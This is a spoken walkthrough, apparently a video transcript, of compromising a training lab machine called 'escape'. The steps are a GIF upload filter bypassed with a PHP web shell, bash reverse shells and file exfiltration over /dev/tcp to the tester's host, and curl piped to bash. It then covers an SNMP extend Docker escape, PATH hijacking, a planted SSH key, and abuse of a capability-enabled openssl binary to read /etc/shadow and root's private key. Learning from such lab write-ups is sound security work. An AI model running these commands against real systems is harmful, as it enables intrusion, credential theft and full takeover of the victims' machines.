Rust scan, tag A for the address. We have this IP address, tag U for the U limit, and dash dash, and then we can specify different nmap options. So we're going to do SC for default scripts, SV to enumerate the versions, and dash ON to output to a file. Call it initial, like this. And what I also want to do is do a VV to get the TTL and stuff like that. So let's go ahead and send this through. This is a regular port scan. We also have a full port scan that I'm going to run because I don't want to miss anything, right? Off the start of the enumeration process. I want to see every port and service that is running on this network or that's available to me as possible, right? So we already finished the regular one. Let's do a sudo nmap tag p tag sc svon, and then we can call this all ports like this. Let's go ahead and put in the password. Need to go ahead and put in the IP address that would make a difference. There we go. So we have that running. Actually, let's go ahead and add a VV on this as well. There we go. And another thing that I like to do is run a UDP scan. So let's do sudo nmap SU and then SCSV, and then let's specify some ports. Let's do 161, which is SNMP, 162. Oh boy, 162. There you go. And then 53, which is DNS on this IP address, and we can go ahead and output that to enum and UDP. Go ahead and put in the IP address. I mean, not the IP address, the password, and we already have a response back from this. So this is pretty good. We can go ahead and take a look at that now in a moment. So let's go ahead and close this off. We also have the all port scan or the full port scan here that's already done. So let's start with the regular one. So let's do less enum initial. And we have, it looks like 1, 2, 3 ports open here. So we have 22, which is SSH, and it is running Ubuntu. And this is the version of Ubuntu. And if you wanted to find the release that this version was a part of, you can copy this. We can go to Firefox, paste it in here, and we have Launchpad right here. Click on that, and we can see that this was a part of the focal release. So we can go ahead and exit out of that, and that's important in case that you wanted to develop an exploit that's specific to that release. That's just some good information to have, right? So let's scroll down a little bit more. We can see that we have port 80, which is HTTP, running Apache, and it has a title of escape. And we have 8080, which is HTTP as well, running Apache, and it also has the title of escape, but it looks like it has a proxy that might be redirecting requests, so that's important. Now this is weird. Take a look at this. We have Ubuntu here running on port 80, although we have Debian here running on port 8080. So this means a couple of things. This means that either there is some containerization or some virtualization going on here, which is most likely the case because two different OSs is sort of not possible unless there is some type of virtualization happening or containerization happening in the backend. And another thing that we can do to go ahead and make sure of this is we can get the TTL. So we can do ping taxi1 on this IP address. Let me grab it real quick, like this. And we can see that we get 64 bytes and the TTL is 61. So we can go over here to Firefox and we can do let's do default TTL for OS. So the common TTL values are 64 for Linux and Mac. So what does that mean? Why is that important to us? Now we do know that there is some type of containerization because this is a TTL of 61. This means that it took 3 hops to get back to us, this ping, right? Or this packet. And that means one of these happens to be the VPN server that we are going through in order to access this box. And another one could possibly be the container that is also running on the host. So that's just another cool thing that you can do to gather that sort of information and just give you a little bit of an advantage there to know where you're dealing with. Let's close out of this. Let's close out of this. Let's look at that UDP scan, right? So let's do less enum and then Well, let's do the all port scan first. We have 22, 80, and 8080. Nothing else? Nope. So we're good on that. And let's do less enum UDP. And okay, so we have DNS is closed, but we do have SNMP open, which is interesting, SNMP v1 server, and it's giving us a little bit of information here. We have Linux escape, which this is like a uname tag A type of output, or a sort of, how do you say it, a system description. Here you go, system description is right here. This is telling us the version of it, or the version of the OS. So this is a bunch of good information that we have to work with here, right? So we do know that SNMP is open. Let's go ahead and check out those web servers. Now, before we actually do that, I like to have a little bit of enumeration or it's active enumeration, but I call it passive because I'm not really interacting with it. It's just happening in the back end. So we did see, if we remember, if we go back to that mmap scan, we could do enum initial, and we do have port 80 and 8080. So let's go ahead and do a directory brute force on those two. So let's do fuff, and then we can do a -u http:// and then something like this, put in the IP address and add the word fuzz. This is where we're going to input different words from the word list that we could do tag W, OffSec list, discovery, web content, and then we can do, let's do directory list 2.3 medium. There we go. We can click enter here, and let's filter for, we can do filter for words. So we could do FW, or let's type help for a second. You can see right here, FW is filter for word count. So we could do FW and then words of 10. And then we can just do restart like this, enter. And there we go, it's restarting. We can let that run. And we're also going to set up another one for port 8080. So we could do fuff u http and then 8080 fuzz w OffSec list discovery web content directory 2.3 medium. And let's do this again. Filter words 10, restart like this. And we are pretty much good to go on this. Now, we do see that we did get a sort of directory here that's available to us on port 8080. So this is pretty interesting. Let's go ahead and wait to see if we get anything else. But this is where we're going to start our enumeration on the web server. So let's go ahead and start with port 80. This looks like just a normal background image. There's no functionality here. There's nothing going on. There's no JavaScript being loaded. If we do Control R, and that was Control Shift I to open up the developer console, we don't see anything being requested here. And so there's nothing really here. So if we go to port 8080, we can see that it looks almost like the same exact thing, and it does happen to be the same exact thing right here. You can see that it's just loading the JPEG image here. So if I close out of these and we go back to the terminal, we could see that we have a /dev directory here on port 8080. So if we do /dev, we can see that we're greeted with a developer area, proceed with caution. And the description says that as of now, we're only accepting GIF files. So whenever I come to something like this, right? Whenever I come to a upload page that states the certain file that we are going to, or that they only accept, right? The only file that they accept, or file type more like, I begin to assume and try to figure out if there is a file upload bypass vulnerability present within the application, or maybe there was a misconfiguration that the developers put within the application that allows for us to upload files of a different extension type. So the first thing I'm going to go ahead and do from here is that I want to open up Burp Suite. And I want to go ahead and view the actual request in its entirety, just so we can get a visual of how this is working. And one of the first things that we're going to do with this upload page is if we go back here and we go to OSC, Where is that at? Here we go. Machines, escape. We can have a .gif, a regular .gif, upload that, and we can see what a legitimate request looks like. So if we click upload file, we get a legitimate request. If we do Control R, that will send it to repeater, and we do Control Shift R, we can go to the repeater tab, and we can see a couple of interesting things here. Number one, this is a post request to /dev/index.php. We can also see that here is the file name. It is a .gif and the content type of image/GIF, and also the magic byte of a GIF included with all this data that just happens to be inside of a picture file, right? For example. So we can go ahead and send this through, and we can see what a legitimate request looks like. So if we scroll down a little bit, we can see that file is valid, that the server responds with a file is valid and was successfully uploaded. And then this uploaded, I guess, button, if we go to render, we can see, yeah, it's like a button. And from there, we can see that this href, which is just like a referencing to in HTML to this endpoint here. But there is a /uploads directory that holds our file in it. So if we go back and we turn off Burp Suite here, and we do uploads and then logo64.gif. Was it logo64.gif? No. What was it? Let's see. Oh, it was. That's weird. Copy. And, oh, that's why. That makes sense. There you go. And we can see that we actually have our logo here. So that is pretty cool. Now we know where our upload gets stored when we do upload a file successfully. So now let's go ahead and see what the application really cares about when it comes to restricting files of different types to be uploaded. So it could be a couple of things, right? It could be the magic byte or the actual contents of the file. It could be the extension, that there is a whitelist or a blacklist on certain extensions, or it could be the content type, right? So let's go ahead and create a PHP file. And we know that we want to create a PHP file because if we go over here to this Wapalizer extension, we can see that this is running Apache and the programming languages is running PHP. So in order to get execution, we're going to want to utilize PHP. So let's go ahead and close this out and close this one out. And then we can do a VI with, let's do exec.php like this. And then in here, we can go ahead and, let me make this a little bit bigger, do PHP and PHP info like this to go ahead and list out the PHP info and close it off. We should be good to go just like this. Now, another thing that you could do instead of this PHP info is send a ping command to yourself to see if you get a response or if you get pinged, and then you know that a code execution is possible through this method. So let's go ahead and write and quit this. Let's go back, make this a little bit smaller again, and let's go ahead and upload this. So we go back and we go to exec.php, open, turn on the proxy again, upload file. We get it right here. Is this the one? No, drop this one. Here it is. Let's send this to repeater. And here we are, right? So the first thing that we can try out is, let's say, the extension, right? So let's do a, what is a bypass? Far is a PHP upload bypass extension. We can scroll down and we can see that we get a sorry GIF only. So we can go ahead and do sorry. We can specify the keyword here to know when something works. So we can also do PHP 5, for example, send that through. We have one match, PHP 2. Let's see this one. And we get sorry. So I'm assuming that it is not the PHP extension that is the problem or that the application cares about. Let's see. What if we added a magic byte here? If we did GIF like this, 8 with a semicolon. Let's send this through. We also get a sorry. So now I've just crossed 2 of these off of the list. The only thing that could be left is this application xphp. So what if we went ahead and changed this to image/gif and sent this through? What happens? We get 0 highlights. We scroll down and we get file is valid and was successfully uploaded. And we can go ahead and see the file that we have uploaded. So let's copy this. Let's go back, turn burp off, and let's paste this in, execute it, and we have PHP successfully executed on the server. So here we can get a couple or a little bit more information about the actual host that we landed on. So right here we are the www data group, user and group. We can scroll up a little bit and we can see that this is actually a Docker container or a container of some sort, because look at this. Look at the host name of the machine or of the host. It's a bunch of random letters and numbers all combined. And I believe if we do Docker, yeah, we have this Docker PHP extension. So this is just proof that we now have code execution on here. So let's go ahead and change this up a little bit. Let's go back to burp. Let's change this from PHP info to a system call. And then we can go ahead and put $_requests, use the request module, and then put CMD or whatever you want in this parameter right here. This could be shell, exec, CMD, CI. It doesn't matter what it is in here. This is just the parameter that we're going to request commands to. So right here, we can close this statement off with a semicolon. And this requests module is for this request right here to either be sent as a post or a get request. That's why we're using it. If we just did get, sometimes there are some problems with getting command response or command execution on the actual server. So we're going to use the requests module and send this through. We should get a uploaded. Awesome. So if we reload this, we get this. And if we do a $CMD equals ID, now we have command execution. And so what we can do from here is we can actually get a reverse shell on the server. So there's a bunch of different ways that we can actually do this. Let's go ahead and get this in burp again. It's just a lot easier to work in here. Let's do, all right, intercept is on. Let's go back here, click enter, and here we are. Send it to repeater. And here I'm just going to go ahead and change the request method to a post. And one of the easiest ways that we can get a reverse shell is to do a normal bash reverse shell, right? Let's exit out of this and let's do sudo ncat nvlp and let's do port 443 just in case there is a firewall in play. Here we go. Let's go back here. And what we can do is bash tag C, right? And then let's do a bash tag I 2 and /dev TCP 192.168.45.222 on 443 and then 0, 2, and 1 like that. These are just a bunch of redirectors, redirecting standard in to standard out and redirecting to a backgrounding effect. And so what we can do from here is grab this entire string here. We can right click, go to right down here, convert selection, URL, and then URL encode all characters. This is going to URL encode all the characters so that there's no special characters that mess up the actual execution of the command. We can send this through and we don't get a response. It's hanging. We go back and we have a shell here. If we exit this, there is another way that you can do this. And I haven't actually tested it yet, so we're going to find out if it works or not. We can do JQ like this, echo all this, and then we can do JQ -R for raw, and then R for, what was it? Let me see. I wanted to see the actual flags, it was raw output. Okay, there we go. So dash capital R for raw input and dash R for raw output. So let's go ahead and do this, R, and then at URI like this. We get it all base64, all URL encoded. Copy this. Let's try it here. Go back, paste this in here, and send it through. We don't get a response, and we get a reverse shell. One of the first things I like to do when I get on a makeshift shell like this is stabilize the shell using any binaries that are actually available to us in the environment. So the first thing to do is to identify which binaries we have access to or which are present on the environment. So we could do which Python 3, nope, which Python, like this. Don't have that there. We can do which script. This is weird. There we go. It was lagging a little bit. And we do have script here. So we can do script and then dash qc bin bash and dev null like this. There we go. We can do control Z to background it. And we can do stty raw minus echo semicolon fg. Enter, and then export term equals x term like that, and we can clear the screen. So now we have a little bit more of a stabilized shell and we can work a little bit better, right? So if we do an ls-la, we can see the exec.php that we use to get the reverse shell. If we go to the root directory and we do ls-la, we can see that we are indeed in a Docker environment or in a Docker container. We can also tell that through the host name. So if we did host name like this, we can see the host name right here. If you wanted to do a uname tag A, you can see the same system description that we saw in the PHP info. So that's another thing that you could do. So let's see if we can try and escalate our privileges to root. One of the first things I'm going to check is the environment variables, because sometimes there are hard-coded credentials in here, maybe for a database or some type of web application or something like that, right? But it doesn't look like there's anything here for that, just like default configurations. We can clear that out. We can try and see for any SUID bits. So we could do find /perm and then 4000 and then 2 dev null like this. This is going to search for all the SUID bits, and there's nothing in here that really stands out to us. We can see, let's do ls-la on /home. There's no users, cat etc pass wd, and then grep for sh like this, only root. Okay, so we don't really have a privilege escalation method right now, although I am going to check the mounts of this container. So we can do mount like this, and we can see a bunch of stuff in here. Now, one of the first things that I'm looking for is the dev sda1, which is right here, and the temp fs. The dev sda1 happens to represent the host, and the temp fs happens to represent the container. So let's do a mount and then grep for, I think we could do -e, and then can we do temp fs and dev sda1, I believe. Yeah, there we go. All right, we can see a couple of things from here. Number one, we can see that this is mounted as on dev and on sysfs, and we can see that this is actually being used to transfer files without actually having to connect to the container. So it's transferring files from the host and back, and from the container and back, without having to actually log in or without having to do any manual efforts, right, in order to do that. Now, another interesting thing here is that this dev sda1 or the host is mounted on the /temp directory, which is kind of odd. You don't see that, right? So this is interesting. This means that one method of communication that we have to the host is through the /temp directory. Now that we know this is very interesting. This is something key to our success, right? So one thing that we can go ahead and check out is something called linpiece. And linpiece is just a Linux privilege escalation script that allows us to find different escalation methods. So we could do locate linpiece.sh. We see it right here. Let's grab it here. Let's do copy linpiece here and set up a Python 3 server on port 80. And then let's do we have curl on here? Okay, we do. Let's go to temp. Sounds good. And then we can do a curl HTTP 192.168.45.222 on port 80. And then we could do linpiece.sh, linpiece.sh. There we go. So we have it here. Now, if you didn't want to drop this to disk, right, let's do an rm-rf on linpiece, and then let's just do this, and then we can go ahead and, we should fix our TTY first. 1 second, we can do a stty-a, and then let's do stty rows 16 calls 126, not 1000. There you go, 126. All right, let's close this off, open up the server, and then let's go back to this. Here we go. And so we could do a semicolon like this, chmod plus x on linpiece.sh, and then we can do bash. I believe this will work. Maybe not. Let's try it like this instead. There you go. Man, this box is laggy. All right, I guess not. Let's do curl and then HTTP 268.45.222 linpiece.sh, and then let's pipe that to bash like that. If we send this through, there we go. You can see the output immediately, which is awesome, and you didn't have to drop it to disk. All right, so let's see what different escalation methods we have here. It's already done. We can scroll up a little bit. We do have this local.txt here, which is in the var www directory, which is the home directory for the www data user. We scroll up a little bit. Let's see what we got here. Got logs. Anything else in here? Those are the SUID bits that we found. Nothing interesting there. Scroll up. Let's see. These are the Apache sites enabled. So this is the Apache configuration files. Let's see, what else? Root, some networking information. So this seems pretty bland, to be honest with you. There's not much here, at least that I'm getting right off the bat. Nothing here, nothing here. All right, so I guess it didn't catch it. Now, one thing that we could also do that I didn't see it check for was in the backups directory. So if you go to cd/var, there is this backups directory right here. If we go into there, we can see that there is this snmp.conf. So remember that snmp is actually running on the machine. So this is fairly important. This is the configuration file for snmp. Let's go ahead and send this configuration file to ourselves. So let's split the screen here and let's do a cat.snmp.conf to dev tcp 192.168.45.222 on port 9999. And then we can do a ncat nvlp 9999 to snmp.out or list, whatever we want to call it. Send this through. We get the connection, ls-la. We have this snmp.list right here. Cool. So let's go ahead and bring this up a little bit just so we can see. And then we can do a less snmp.list. And remember, we are looking for something important here. We're looking for the community string that is subject to this specific SNMP server, right? So if we scroll down a little bit, we can see that this RO community string right here is this. So this is the community string that allows us to connect and get output from the SNMP server. So let's go ahead and put this in a notes file. So we could do vi notes, paste that in here and save it. And then we can close that out. Let's keep scrolling down. Maybe we get another important piece of information, maybe some credentials or something. We scroll down, we can see a couple of things. Nothing really that useful here. Now, another important thing to note is MIBs, right? Or the management information bases. Those are sort of databases, right? I explained this a little bit before, but those are sort of databases that allow or that speak in a common language with other like networking devices in order to allow them to sort of communicate with different management applications, right? And so there is this one MIB that allows for arbitrary extensions of shell commands on the host, and then have that output of those commands be sent through an SNMP walk, right? Something like we performed before. So that being said, there is this extending the agent MIB here that by adding this extend, we can name the extension and then we can name a certain command that we want to run here. Now, what's interesting about this test3, right? Remember we saw that the host is actually mounted on the /temp directory. So we have this /temp/sh test. So if we do echo, or let's go to /temp, right? And we go ahead and put our own file in the temp directory that's named sh_test. And why do we know to do this? Right here, it says, note that the last entry requires the script sh_test to be created first. So let's go ahead and do echo, and then we can do echo-n bash tac c. Let's go ahead and do another reverse shell bash tac I to and dev tcp 192.168.45.222 on 443, and then we can, let's not do 443. Let's do something like sure 9999. Let's hope that works. And then if not, if there's a firewall in play, we can go ahead and use a normally accessible port, right? So 0, 2, and 1 like this. Close that off like that, and then we can put it into sh_test like this. Go ahead and send it through. There we go. Now if we do lsla on sh_test, we have it there. Cat sh_test. Awesome. Oh, actually, what? That was weird. This cat sh_test. Oh, okay. That was weird. It opened up twice. I mean, it looked like there was 2 entries there. All right. So now we have that, right? Now, another thing that we can do is we have to go ahead and chmod it to add it to be executable. There we go. And we have to do a couple of configuration changes on our machine first. So number 1, in order for this to be able to run, we need to query these MIBs, right? Either this one or this one or this one right here. It says to walk the SNMP extend MIB tables. So let's go ahead and close this out. And one thing that we have to do beforehand is install SNMP on our box and change the configuration file to allow all MIBs to be queried. So what we have to do is let's do if you don't already have SNMP on your box, you can do sudo apt install SNMP tac-y, put in the password. There we go. Mine's already installed. We can do also a sudo apt install SNMP download, or I think it's MIBS downloader. I believe it's MIBS download. Yes, it is. Awesome. So it's the MIBS downloader. So then we can do sudo, or is it sudo MIBS download? Or is it download MIBS? MIBS? There we go. So we could do a sudo download MIBS like that to download all of the possible MIBs. And I believe if we look through here, we would find that extend MIBs portion. If we do grep extend, let's see if that comes up with anything. Not that we need to see it right now, but it's a part of that. Also, we can also see where the MIBs are stored on our machine, although that's not really that important as of now. We could do locate MIBs. Here you can see var lib MIBs, and here are all the management information bases. So the next thing that we can do from here, right, is edit our snmp.conf. So if we do vi, or we want to do this with sudo vi etc snmp and then snmp.conf, we can see this MIBS portion right here is sort of grayed out. Now grayed out, but there's no actual value here. So what we're going to do is add a plus all to add all MIBS to be queried, or allow all of them to be queried. And now that is it. We are set to go. Now all we have to do is do snmp bulk walk like this, do a version of 2c. And actually, before we do this, let's go ahead and do a ncat nvlp 9999. Just set that up. We can do a -c for the community string. Let's cat notes, grab this string, and let's clear this out so we can get better. There we go. Put this community string in and go ahead and grab the IP address. Put in that IP, and then also we want to do that ns extends and then output 1 like this. Send it through. Let's see. So we didn't get this here. Is it extend? We can go ahead. Oh, there we go. It's extend. We could have just opened up the, let's close this out real quick. We could have just cat snmp.list grep extend and then see that it was ns extend. All right, so cool. There we go. Now we have a shell on the host machine. So that was a pretty cool portion of the box, a pretty cool Docker escape vulnerability that was present through SNMP. Now, from here, let's go ahead and close this out. Close this one out. We don't need that shell anymore. And now we are on the box. So once again, I do like to stabilize my shell. So let's go ahead and do a whoosh python 3 like this. There we do. We have python 3 tag c import pty.spawn bin. Actually, you know what? Do we have script? Which script? Yeah, we do. Script qc /bin bash, and then we could do dev null. This seems a little bit easier to me. stty raw minus echo semicolon fg enter export term equals xterm. Clear the screen. So now we're on a new environment, right? Now we want to go back to the enumeration process again. We want to know what binaries, what services are running on here. We want to know what processes are running, if there's any cron tabs, if there are any stored credentials somewhere. And so let's go ahead and start with the ID command to see if we're a part of any specific groups. No, we're not a part of any special groups, only this Debian SNMP group. We can also do uname tag A to see the system description. We can see that now we are on the host of escape, and we can see the actual, the actual format running here, Ubuntu instead of Debian. So here we have a couple of things to do. We can also check the environment variables. We don't have anything interesting here, no credentials or anything there. We can also do a ps-ef to see different processes that are currently running. Let's go ahead and clear this, and let's do it again, but grep for root. Let's see. we do have cron running here, count services, container D, we can see the container running there, Docker. Nothing really that important out of this. Let's go ahead and see if there's any internal ports running. We can do SSNTLP. We don't really have much. We have this 37891. I don't think that's anything viable or important to us, though. Have this 8080. These are the web servers and 422. Okay, so let's see what else we can do. If we do ls-la on/home, we can see that there is a Tom user. We can also check what other users are on the box by doing cat etc passwd and then grep 4sh like that. And there's only Tom, so that's pretty good. That's pretty interesting. Now we can do a find slash. There we go. And then we can search for anything that Tom owns. So we could do user Tom to dev null like this. So we have this user bin log console and opt cert OpenSSL. Hold on. Can we do ls? Oops, not that. And ls? No, not like that. There is a way to add do a command through find. There we go. Cool. So we could do this dash LA command, and then we can see the actual specifications of the file, right? So we can see here that we have this user bin log console, and we have this SUID bit set on this log console binary right here. So that's pretty interesting. That's something that we can go ahead and take a look at now in a moment. We also have this opt cert OpenSSL. We have home Tom. These are just things that are located in Tom's home directory. So these two things are fairly interesting right here, this opt cert OpenSSL and the log console. Let's go ahead and start with this log console thing here that we have. So let's do a user bin log console and see what this is. Okay, so we do have about the system, current process status, lists all the users logged in and out. So this looks like just different options to show some system information, right? If we click one, click enter, we get this, it looks like a uname tag a command being run. We get number 2, which is the current process status. We get all the running processes. If we do 3, we get a list of the users logged in and out. Number 6, CPU information. Okay, so this is cool. Now, we don't see any obvious misconfiguration here, right? So another thing that we can do in order to see what this program is running in the backend or what libraries this program is reaching out to in order to get this output of these commands is we can run this. If we quit this, I think exit. Oh, definitely not. Did not mean to do that. Oh, God. Jesus, that was crazy. Okay, if we do a ltrace on user bin and then log console, we can see the actual libraries that are being called when these commands execute. So funny enough, right here, we're setting the REUID to the UID of ourselves. We are going ahead and seeing all of these puts. These are the commands, or these are like what is being, how do you say it, configured within the development of this binary. We see this printf. Okay, let's go ahead and enter, let's say 1, for example. We click 1, we scroll up a little bit. We can see that it's doing a system call on on bin uname a, and then giving us this output here. Cool. Let's see number 2. We can see that if we scroll all the way up a little bit, oh God, there's a lot of stuff here. Yeah, here we go. It's running bin ps aux and then giving us all this output. We go back to the bottom. Let's do 3, for example. We have this user bin last and then giving us the output. Awesome. If we go all the way down and we see number 6, enter, we get all of this CPU information. Although we see something interesting here, right? We see this system call for ls CPU. Now, it's not using the full absolute path of the binary. Now, what does that mean? Now, this is a vulnerability that we can go ahead and utilize, and it's called a path hijacking attack. So instead of the legitimate binary being run, we're going to create our own binary called lscpu, go ahead and edit the path that the system looks for binaries for, and then have it run to our binary instead of the legitimate one. So cool. Let's go ahead and go down. Let's exit out of this. Okay, I guess not. There we go. So let's exit out of that, right? And what we can do is let's go to either temp or dev.shm. Those are sort of a little bit more discrete, how do you say it, directories in the temp file, and no temporary files get removed on reboot. So whatever, it doesn't matter. We can go to /cd/temp, right? Let's see, there's nothing much in here except for sh tests. And so that's another thing important. If we do ls, we can see the sh test in here, and we can see that this is synced with the container. And that's just another cool little artifact there. Although, cool. We have this, right? So let's do a vi on ls CPU. Let's create our own binary. And in here, we're just going to go ahead and put an easy bin bash tac I like this. Let's go ahead and write and quit this. And now if we do ls-la, we can see that we have this ls CPU. We can do chmod plus x on ls CPU. And if we do echo $path, we can see the path that the system takes in order to find binaries when it's going to head and searching for them, right? So it goes to user local sbin, and then user local bin, and then user sbin, user bin, sbin bin, and so on and so forth, right? So what we can do is we can do export path equals /temp like that, and then we can do a colon and then $path like this. If we click enter and we do this echo command on the path again, we can see that the first directory that it looks for, that the system looks for a binary in, is going to be the temp directory. What does that mean for us? That means let's go ahead and do a user bin log console. Here we go. And we can go ahead and click on number 6, enter, and here we are with Tom at escape. So we have just moved laterally to Tom, which could have potentially more privileges or more, how do you say it, more opportunities for privilege escalation vertically on his account, right? So now we have him. Now we're good on that. But although we did see another binary that was subject to him in particular, right? So if we go to cd/home, we can see Tom, and you can get the local.txt if you wanted to, right? Although I was more interested in that, what was it, opt cert OpenSSL? I believe cd opt, cd cert, yeah, cd cert, and there we go, OpenSSL, awesome. So one of the first things that we can do from here is we can actually drop an SSH key in Tom's directory to go ahead and log in with SSH. Let's do SSH key gen tac f Tom. Doesn't matter, ls, and we have it here. Awesome. Cat tom.pub. Grab this. Close this out. Let's go here, cd/home tom, and then make a directory for .ssh, cd.ssh, and let's vi authorize keys like this. Paste this in here. Actually, hold on. Let's delete that, set, paste, just so there's no, there we go. Go ahead and do that. And now we should be able to do SSH, tech I, tom at, and then the IP address. Let me grab that right now, paste it in here. Yes. Should be able to log in. There we go. And we are in as Tom. We can go ahead and close this out, exit, and we'll just go ahead and close that pane. Let's do bin bash. There we go. So great. Now we're Tom at escape. So let's go ahead and take a look at that file. Let's do cd opt-cert and then ls-la on OpenSSL. Okay. So we do have read, write, and execute, but it's not an SUID bit, right? But this is odd. Now, there is another method of privilege escalation without SUID bit that could be set on a particular binary, right? And I believe that LinPs does catch this. So let's go ahead and upload LinPs real quick. Let's do temp, and do we have curl? Yeah, we do. Curl HTTP :// and then we can do 192.168.45.222 and linps.sh and pipe that to bash. And here we can do a Python 3 m HTTP server 80. Send this through. Here we go. We'll probably get more output here. Because we're running as a new user, we would have gotten more output from the Debian user because this is obviously another host, so there could be other vulnerabilities within this host. We scroll down a bit here. We can see a couple of things here. We can see that this opt-cert OpenSSL has an equal EP on it. Now, what does this mean, right? The equal sign means all capabilities have elevated privileges to be run, right? So this OpenSSL, opt-cert OpenSSL that we own as Tom has elevated privileges to run all capabilities. And what does that mean for us? How do we take advantage of this? This means that OpenSSL can potentially be run as root or with root privileges on the back end, even though it is owned by us and we run it as us. It will still run the processes and the default configurations as root to go ahead and successfully execute the binary. So let's go ahead and take advantage of this, right? So what are we going to do? How are we going to take advantage of this? The first thing that we're going to do is create a key and a certificate so that we can go ahead and use OpenSSL to set up a secure server on the root of the file system, and then go ahead and be able to read any file on the file system as root. So let's go ahead and start off with the key and certificates. So let's go ahead and go to dev shm. So let's do cd dev shm like this. There we go. And there's nothing in here just to make sure. Great. So we can do OpenSSL, right? And then we can do request -x509. And then we want to go ahead and do a new key, and then RSA 2048, which is the protocol or the algorithm, and then the bit size. And then we're going to do a key out for key.pem, and then a out for the cert.pem. And then we're just going to add this nodes flag here at the end. We should get all this. Just continue to click enter until you have set this cert.pem and key.pem. Awesome. So now what can we do? We already have these set up. So let's go to the root of the file system and let's do a opt-cert OpenSSL, right? And then we can do a S server to set up a secure server. And we can do a key and dev shm, and then key.pem. We can do a cert dev shm, and then cert.pem, and we could do a port of, let's say, for example, 4444, right? And then we can do the HTTP protocol. Click enter. All right. Oh, actually, let's go ahead and close that for a second. Let's add a and sign here just to background it so we are able to still use our terminal. Let's do this, click enter. Okay, looking good. Now let's do SSNLTP to go ahead and make sure that's running. We can see 4444 is running here. I do want to try something first before we finish this off. Maybe we can do a curl -k HTTPS and then try the IP address of the server on port 4444 etc shadow like this. And let's see, not allowed. Okay, cool. So that doesn't work on here, although on here, I believe that should work. So we could do curl -k HTTPS / local host 4444 / etc shadow. And there we go. We have execution or file read as the root user. So what can we do with this, right? Let's go ahead and clear this screen. Let's go to root .ssh, and then we can do ID RSA. We have his RSA or SSH private key. We can grab this, copy, right? Let's go ahead and go out. Let's create a VI root ID like this. Set paste. There we go. Paste that in. Save and quit it. chmod 600 on root ID. And then we could do root or SSH I root and root at this IP address. Should be able to get in with that. Yep, there we go. We are root on the box.